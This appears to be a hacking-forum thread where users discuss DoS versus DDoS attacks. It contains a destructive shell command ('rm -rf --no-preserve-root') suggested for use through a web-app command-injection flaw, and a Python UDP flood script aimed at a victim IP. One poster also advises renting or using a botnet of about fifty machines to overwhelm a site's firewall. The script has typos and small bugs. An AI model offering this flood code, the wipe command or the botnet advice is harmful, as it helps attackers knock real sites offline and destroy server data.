DDOS
lol, are you talking about the command in his signature ? You won’t DDoS anything but your terminal with this :p
Only you = DoS ( Denial of Service )
Multiple sources = DDoS ( Distributed Denial of Service )
DDoS is not only about using a script mate :)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
You are rigth @Mugiwara27, he is probably speaking of my signature XD. I didn’t even understand it.
But if you want to try that command @Anon1467, you will effectively need a Linux distro.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1
So, if you found a command injection vulnerability in a web application, you can try running what @Mugiwara27 said:
rm -rf --no-preserve-root
That would be very funny… XD
And would be even more funny when the IT catchs you XD…
emmm… do not try it… seriously… is dangerous….
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi
Anyway, @Anon1467, if you really want to learn hacking, you can try starting reading this books:
http://data.ceh.vn/Ebook/ebooks.shahed.biz/HACK
Maybe this books teach you something about hacking, and whats even more important, something about ethics.
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi
@L00PeR if you execute that command from a command linjection on a web app, you won’t do a lot of damages, as it will be runned as www-data and won’t have root access.
By the way, is it a good idea to edit the content of the web server so that www-data have only read access?
You can use the UDP with python language for DOS a public ip ( web site, livebox …) and you can use a botnet for A successful Ddos attack .
exemple :
import socket
import random
input("IP victime : ")
port = 4444
victime = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPOTO_UDP)
victime.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
byte = random._urandom(1024)
while True :
victime.sendto(byte,(ip, port))
Add me on hackthis
Or speak with me on IRC channel : https://www.hackthis.co.uk/irc/
Try to Ddos me, My ip : 127.0.0.1
Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi
I think because a lot of webmastersne parameter not their firewall and if it do they do not have probes ddoset and firewall are run overwhelmed if you attack them with more than a dozen machines (50 it’s perfect for an udp flood )
Add me on hackthis
Or speak with me on IRC channel : https://www.hackthis.co.uk/irc/
Try to Ddos me, My ip : 127.0.0.1